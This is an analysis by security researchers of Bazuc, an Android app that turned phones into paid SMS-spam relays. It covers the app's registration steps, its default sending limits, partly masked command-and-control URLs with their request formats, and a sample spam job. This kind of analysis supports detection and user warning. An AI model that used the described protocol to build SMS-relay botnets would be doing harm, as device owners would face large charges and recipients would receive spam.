Clarification - 13/12/13: The analysis below focused on the Bazuc PRO + International version (v2.3), which was active and present on Google Play in late October/early November 2013. Bazuc PRO + International version (v2.3) enabled users to allow international-sending of SMS if they so consented by clicking within the App in the configuration page during registration. Since then Bazuc has released new versions which makes it more difficult to allow the sending of international destined SMS (users must email Bazuc to enable it) and whose main focus is to enable the sending of SMS nationally.

 

What is Bazuc and what is it doing?

According to the website of developers of this application Bazuc is ‘a free Android app that will allow you to earn extra money every day by selling us your SMS / Text Message credits that come with your monthly phone plan.’ There’s no secret that many mobile subscribers have prepaid (or even unlimited) number of SMS messages which can be sent from device. And some people don’t use all SMS messages each month. That is why Bazuc developers offer them a small amount of money per each message which will be sent from their device. Users only need to install a Bazuc application. Developers promise to pay $0.001 per each SMS sent from user’s Android device. Sounds like a good deal, right?

Bazuc application

What is it doing actually?

The answer to this question is: Bazuc turns your device to an SMS sending bot - its sends sms messages from advertisers to destinations around the world. And that is not good for a person who installed this application for a few reasons. First, normally the user's unlimited messaging does not include unlimited international messaging, which is the main target of these Bazuc apps. So even if you are being paid $0.001 per message, you could be shelling out $0.50 per message to your operator to text countries around the world, running up huge bills for the person who owns the phone. Also, in many cases the advertising sms being sent would be classified as spam, meaning in the worst case scenario the mobile operator will disable you mobile phone number because of the large amount of SMS spam messages being sent from your device.

How is Bazuc doing it?

Upon installation, the app sends an SMS from the device to itself. This verifies that the app (and the device) has capability to send SMS. The text of the message is the following:

BAZUC Phone Number Validation

Upon successful receipt of the message, the app then sends a registration HTTP request which contains the device phone number, country code and whether the user has given permission to send to international destinations. As a response Bazuc receives a hashed registration key back from the server. Then the app then replies with this hashed registration key (confirming receipt). After that it sends the configured daily and monthly message sending limits. The default configuration values are:

Daily 3,000 SMS
Monthly 30,000 SMS

The server sends a confirmation response and Bazuc then starts to receive candidate messages, and immediately sends these on.

Do you have any details on Bazuc network communications?

Yes, we do. Bazuc works with the following C&C: 192.241.***.***

Registration.

- Bazuc sends local phone number, MCC and whether accept sending to international or not in the following format:

http://192.241.***.***/registration?phone_number=[removed]&country_code=+1&international=true

- Servers issues a registration key which may look like this:

b9147e3ea66764******************

- Bazuc app confirms this key in the following format:

http://192.241.***.***/sms_sent_count?reg_key=b9147e3ea66764******************

- As a response server initializes count in order to calculate a payment.

- After that client uploads configuration which contains limits for sending SMS messages and account for payment in the following format:

http://192.241.***.***/user_limit?reg_key=b9147e3ea66764******************&dayLimit=3000&monthLimit=30000&paypal=victim@randomserver.com

​Sending SMS messages.

- Bazuc sends a request to C&C int the following format:

http://192.241.***.***/jobs?reg_key=b9147e3ea66764******************

- Server responds with ‘NA’ if there’s no job and if there is a job then the response will contain the following data which is going to be processed by Bazuc application:

"id":632724,"recepient":"+4475********","message":"Hi Jadr your loan app of 1000 for Personal Use has been conditionally approved. Please call 087********. Ref F********","timeStamp":1383xxxxxxxxx,"reg_key":"","status":1,"last_updated":"","user_id":"","error":"","valid":true}

- Bazuc sends this messages and sends the a confirmation back to C&C http://192.241.***.***/job_status?reg_key=b9147e3ea66764******************&status=4&job_id=632723&error=na and increments a count for a calculation.

Geography and content

Bazuc sends SMS messages with different content to different phone numbers in many countries. Here is the diagram which shows out of a sample of 54 the most popular destination countries for messages sent by Bazuc.

 

Most popular SMS destinations

The content of these messages may vary from country to country. We’ve seen a lot of messages containing everything from spam payday loan offers sent to UK numbers, to Russian language advertisements sent to Ukrainian numbers.

Bazuc application was available on Google Play but has been removed. It was downloaded approximately 10 thousand times before taken down.

Why should not install it? It helps me to earn money!

Bazuc won’t help you to earn a lot of money, in fact it could cost you tens of thousands of dollars, euros or pounds and cause your phone to be disconnected. If something is too good to be true, it normally is.

Authors: Denis Maslennikov, Security Analyst; Yicheng Zhou, Security Analyst